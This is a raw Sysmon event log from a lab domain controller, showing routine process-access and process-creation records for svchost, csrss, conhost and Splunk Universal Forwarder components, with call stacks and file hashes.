14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.394{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.394{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.897{59A5CD1D-95F6-6005-6F05-00000000A301}61365964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.737{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.738{59A5CD1D-95F6-6005-6F05-00000000A301}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.065{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:46.066{59A5CD1D-95F6-6005-6E05-00000000A301}1336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.924{59A5CD1D-95F8-6005-7105-00000000A301}32325444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F8-6005-7105-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:48.768{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 